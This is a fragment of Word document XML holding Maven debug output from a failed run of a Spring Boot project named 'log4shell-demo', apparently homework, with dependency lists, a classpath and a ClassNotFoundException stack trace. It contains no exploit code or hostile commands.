    <w:p w14:paraId="2C93EB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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B26B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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0B6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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20198C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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30E9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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AED3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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B83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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997EA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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C66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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1BF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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E1E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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB6D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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE597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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5119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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0750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org.apache.maven:maven-plugin-api:jar:3.6.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138700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org.codehaus.plexus:plexus-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37E36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org.codehaus.plexus:plexus-classworlds:jar:2.6.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C32E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org.sonatype.plexus:plexus-build-api:jar:0.0.7:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D96F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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A217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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68E31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org.slf4j:slf4j-api:jar:1.7.5:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDDFD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org.ow2.asm:asm:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B08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org.ow2.asm:asm-commons:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C8EA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org.ow2.asm:asm-tree:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419D7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org.ow2.asm:asm-analysis:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BC3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org.jdom:jdom2:jar:2.0.6:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739D1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org.apache.maven.shared:maven-dependency-tree:jar:3.0.1:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6025828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org.vafer:jdependency:jar:2.4.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0CFC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org.ow2.asm:asm-util:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3854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com.google.guava:guava:jar:28.2-android:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0682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com.google.guava:failureaccess:jar:1.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D516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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D26A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org.checkerframework:checker-compat-qual:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A5B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com.google.errorprone:error_prone_annotations:jar:2.3.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A82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com.google.j2objc:j2objc-annotations:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485DA0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org.apache.commons:commons-lang3:jar:3.7:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B1E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Created new class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9495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Importing foreign packages into class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2FB3B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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270D3A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Populating class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417DEF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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753EDB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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D465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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C39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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E11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com.fasterxml.jackson.core:jackson-core:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00FE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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2075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net.java.dev.jna:jna-platform:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B4B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net.java.dev.jna:jna:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65923D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Included: org.apache.commons:commons-compress:jar:1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D791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org.apache.httpcomponents:httpclient:jar:4.5.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC68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org.apache.httpcomponents:httpcore:jar:4.4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00442F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commons-logging:commons-logging:jar:1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD342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commons-codec:commons-codec:jar:1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255590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org.springframework:spring-core:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA40D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org.springframework:spring-jcl:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A630A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org.tomlj:tomlj:jar:1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5520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org.antlr:antlr4-runtime:jar:4.7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147DA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com.google.code.findbugs:jsr305:jar:3.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F02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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7569A2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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70802A3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org.codehaus.plexus:plexus-interpolation:jar:1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE02F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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D67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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DAB2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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F9A4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commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75195F1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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696314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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192030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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030164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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676898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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2F6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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B329C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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256BB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org.codehaus.plexus:plexus-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04658D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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FEB8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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FFF4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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41A4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org.ow2.asm:asm:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234936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Included: org.ow2.asm:asm-commons:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABDAB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org.ow2.asm:asm-tree:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BE5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org.ow2.asm:asm-analysis:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126CC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org.jdom:jdom2:jar:2.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B77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org.apache.maven.shared:maven-dependency-tree:jar:3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EE1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org.vafer:jdependency:jar:2.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51347C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org.ow2.asm:asm-util:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A612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com.google.guava:guava:jar:28.2-android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11730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com.google.guava:failureaccess:jar:1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B765F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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D61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org.checkerframework:checker-compat-qual:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA32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com.google.errorprone:error_prone_annotations:jar:2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13821A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com.google.j2objc:j2objc-annotations:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BFC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org.apache.commons:commons-lang3:jar:3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2196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org.springframework.boot:spring-boot-maven-plugin:2.5.5:run from plugin realm ClassRealm[plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293F59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'org.springframework.boot:spring-boot-maven-plugin:2.5.5:run' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71407C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addResources = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9265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agents = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787096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classesDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124962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directories = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245A20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excludes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ACB9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fork = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5801B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includes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64467D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mainClass = com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E738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optimizedLaunch = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB243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profiles = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAE6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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F437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(f) session = org.apache.maven.execution.MavenSession@3cd59ef5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F9D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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21F7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useTestClasspath = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2985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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8EB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Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F13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JVM argument(s): -XX:TieredStopAtLevel=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A94B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Classpath for forked process: /home/ec2-user/log4shell-homework/target/classes:/home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar:/home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar:/home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar:/home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar:/home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar:/home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar:/home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar:/home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar:/home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar:/home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8448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Application argument(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A38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Environment variable(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4896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Could not find or load main class com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBAF8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Caused by: java.lang.ClassNotFoundException: com.example.log4shell.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D133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5CB4169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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2B12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44E34E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Total time:  2.500 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5037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Finished at: 2025-05-29T00:36:42Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23795B1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01A91E6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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF6D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org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152996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(MojoExecutor.java:215)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77783F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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F38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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D936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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431CB16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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECDD8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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F8FB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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5ED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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473679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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE246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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA32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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F1D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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7650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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C1E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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CF2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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2541F5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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76EE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at java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A101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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE8E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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B67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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497D19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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5154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Caused by: org.apache.maven.plugin.MojoExecutionException: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2530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org.springframework.boot.maven.RunMojo.runWithForkedJvm (RunMojo.java:101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C3E2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org.springframework.boot.maven.AbstractRunMojo.doRunWithForkedJvm (AbstractRunMojo.java:286)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC582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org.springframework.boot.maven.AbstractRunMojo.run (AbstractRunMojo.java:251)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E2C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org.springframework.boot.maven.AbstractRunMojo.execute (AbstractRunMojo.java:223)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C318A2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org.apache.maven.plugin.DefaultBuildPluginManager.executeMojo (DefaultBuildPluginManager.java:137)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D98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(MojoExecutor.java:210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DE93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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888A5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org.apache.maven.lifecycle.internal.MojoExecutor.execute (MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3FBE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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174C9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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48713C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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B58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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDDA8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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB438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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F28F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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558AE6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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8C3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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F45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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC5E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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52A77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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F0A0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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D03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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA93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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA7EA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at org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D96B3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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2A3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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CF7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05303F2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F25CB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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB5A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[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28FD2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clean package -X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E7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Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B249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Maven home: /usr/share/maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B50D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Java version: 17.0.15, vendor: Amazon.com Inc., runtime: /usr/lib/jvm/java-17-amazon-corretto.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADFB1A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Default locale: en, platform encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF9D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OS name: "linux", version: "6.1.134-152.225.amzn2023.x86_64", arch: "amd64", family: "unix"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629C55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Created new class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8429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Importing foreign packages into class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E0C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javax.annotation.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2DA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javax.annotation.security.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6806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javax.inject.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC497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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED14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org.apache.maven.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C376C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org.apache.maven.classrealm &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542B9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org.apache.maven.cli &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4F3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org.apache.maven.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EF3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org.apache.maven.exception &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE31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org.apache.maven.execution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B134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org.apache.maven.execution.scope &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2FDE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org.apache.maven.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738799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org.apache.maven.model &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341737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org.apache.maven.monitor &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE0D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Imported: org.apache.maven.plugin &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B227F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org.apache.maven.profiles &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457008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org.apache.maven.project &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F6C8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org.apache.maven.reporting &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770A6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org.apache.maven.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2F7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org.apache.maven.rtinfo &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7CF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org.apache.maven.settings &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776D81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org.apache.maven.toolchain &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454DE0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org.apache.maven.usability &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC390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org.apache.maven.wagon.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051541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org.apache.maven.wagon.authentication &lt; plexus.core</w:t>
      </w:r>
